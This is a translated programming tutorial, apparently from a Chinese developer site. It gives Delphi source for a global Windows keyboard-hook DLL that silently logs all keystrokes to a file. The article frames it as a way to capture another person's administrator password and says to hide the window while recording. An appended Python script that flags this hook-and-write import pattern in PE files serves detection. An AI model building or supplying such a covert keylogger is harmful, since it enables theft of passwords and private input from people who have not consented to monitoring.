Each program has its own space to run in. In Windows you can have your program perform operations at any time, and operations can also be triggered by messages. Message triggers fall into three kinds. The first is events on your own program's interface, such as OnClick and OnMouseMove. The second is system messages captured through the Windows message mechanism. The third, for when you want to monitor any program at any time, is a hook. There are other ways, but a hook is admittedly a relatively simple way to solve the problem.
Here's an example (debugged with Delphi 7.0):
Suppose you need access to someone's machine, and that person types his administrator password on your machine after running \\SB. You could, of course, use hacker tools to get his password, but why not write a program that records all keyboard activity instead?
First, note that a hook differs from an ordinary application: it has to be implemented as a global DLL, otherwise it cannot capture anything while your program is not the active one (you can, of course, use Windows messages, which are not discussed here).
Write a DLL that defines the following functions:
function Setkeyhook:bool;export;
function Endkeyhook:bool;export;
Procedure Keyhookexit;far;
Procedure Setmainhandle (Handle:hwnd); export;forward;
Function Keyboardhookhandler (icode:integer;wparam:wparam;lparam:lparam): Lresult;stdcall;export;
Procedure Entrypointproc (Reason:integer);
Const
Hmapobject:thandle = 0;
Begin
Case reason of
Dll_process_attach:
Begin
Hmapobject := createfilemapping ($FFFFFFFF, Nil, page_readwrite, 0, SizeOf (thookrec), ' _CBT ');
Rhookrec := MapViewOfFile (Hmapobject, file_map_write, 0, 0, 0);
End;
Dll_process_detach:
Begin
Try
UnmapViewOfFile (RHOOKREC);
CloseHandle (Hmapobject);
except
end;
End
End;
End;
Procedure Keyhookexit;far;
Begin
If hnexthookproc<>0 then Endkeyhook;
Exitproc:=procsaveexit;
End;
function Endkeyhook:bool;export;
Begin
If hnexthookproc<>0 then
begin
UnhookWindowsHookEx (HNEXTHOOKPROC);
Hnexthookproc:=0;
MessageBeep (0);
End;
Result:=hnexthookproc=0;
Mainhandle:=0;
End;
function Setkeyhook:bool;export;
Begin
Hnexthookproc:=setwindowshookex (Wh_keyboard, keyboardhookhandler,hinstance,0);
result:= hnexthookproc<>0;
End;
Function Keyboardhookhandler (icode:integer;wparam:wparam;lparam:lparam): Lresult;stdcall;export;
var
s:tstringlist;
Begin
If icode<0 then
begin
Result:=callnexthookex (Hnexthookproc,icode,wparam,lparam);
Exit
End;
If Lparam<0 then
begin
Exit;
End;
S:=tstringlist.create;
if FileExists (afilename) then
S.LoadFromFile (Afilename);
//Save the keystroke keyboard characters to a file
S.add (FormatDateTime (' YYYYMMDD hh:nn:ss:zzz: ', now) + char (wParam));
S.savetofile (Afilename);
S.free;
Result:=0;
End;
The DLL's project file is defined as follows:
exports
setkeyhook index 1,
endkeyhook index 2,
SetMainHandle index 3;
begin
hNexthookproc:=0;
procsaveexit:=exitproc;
DllProc := @EntryPointProc;
EntryPointProc(DLL_PROCESS_ATTACH);
end.
With the DLL defined, the next step is to build an interface:
function setkeyhook:bool;external 'keyspy.dll';
function endkeyhook:bool;external 'keyspy.dll';
procedure SetMainHandle(Handle: HWND); external 'keyspy.dll';
//Start capturing the keyboard
SetMainHandle(handle);
setkeyhook;
//Stop capturing the keyboard
endkeyhook;
Then hide the window and start capturing the keyboard. Until you stop the capture, all keyboard activity is logged to the file name you defined. Note: this code was written ad hoc, only to illustrate how to write a hook program.
Hooks can do much more than this simple use. How far they go depends on how flexibly you apply them: combined with the many Windows APIs and a few techniques, they can produce unexpected effects.
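Seen from the defender's side, a DLL built like the one above leaves a static footprint: its import names include SetWindowsHookEx alongside file-mapping and file-write APIs. The Python sketch below is an added example, not code from the original article; it flags that combination in a PE image, and the indicator set, verdict names and sample byte strings are constructed assumptions.

```python
# Added example: static triage for the import pattern of a global keyboard-hook DLL.
# Import names sit NUL-terminated in an unpacked PE, so a byte search finds them.
# Packed files, or APIs resolved at run time via GetProcAddress, will not match.

INDICATORS = {
    "installs_hook": (b"SetWindowsHookExA", b"SetWindowsHookExW"),
    "chains_hook": (b"CallNextHookEx",),
    "shared_mapping": (b"CreateFileMappingA", b"CreateFileMappingW"),
    "writes_file": (b"WriteFile",),
}

def triage(blob: bytes) -> dict:
    """Return the matched indicators and a verdict for one PE image."""
    if blob[:2] != b"MZ":
        return {"verdict": "not-pe", "hits": []}
    hits = sorted(
        label for label, names in INDICATORS.items()
        if any(name + b"\x00" in blob for name in names)
    )
    if "installs_hook" not in hits:
        verdict = "no-hook"
    elif "writes_file" in hits or "shared_mapping" in hits:
        # Hook plus a place to store data: the pattern of the DLL on this page.
        verdict = "review"
    else:
        # Hooks alone are common in hotkey tools, IMEs and accessibility software.
        verdict = "hook-only"
    return {"verdict": verdict, "hits": hits}

def fake_pe(*names: bytes) -> bytes:
    """Constructed sample: an MZ stub followed by hint/name style entries."""
    return b"MZ" + b"\x00" * 62 + b"".join(b"\x01\x00" + n + b"\x00" for n in names)

# Constructed inputs, not taken from any real binary.
SAMPLE_HOOK_DLL = fake_pe(b"SetWindowsHookExA", b"CallNextHookEx",
                          b"CreateFileMappingA", b"WriteFile")
SAMPLE_HOTKEY_TOOL = fake_pe(b"SetWindowsHookExW", b"CallNextHookEx")
SAMPLE_PLAIN_DLL = fake_pe(b"CreateFileMappingA", b"WriteFile")

if __name__ == "__main__":
    for label, blob in [("hook dll", SAMPLE_HOOK_DLL),
                        ("hotkey tool", SAMPLE_HOTKEY_TOOL),
                        ("plain dll", SAMPLE_PLAIN_DLL)]:
        print(label, triage(blob))
```

A "review" verdict is a prompt for manual analysis, not proof of keylogging, since legitimate software also combines these imports.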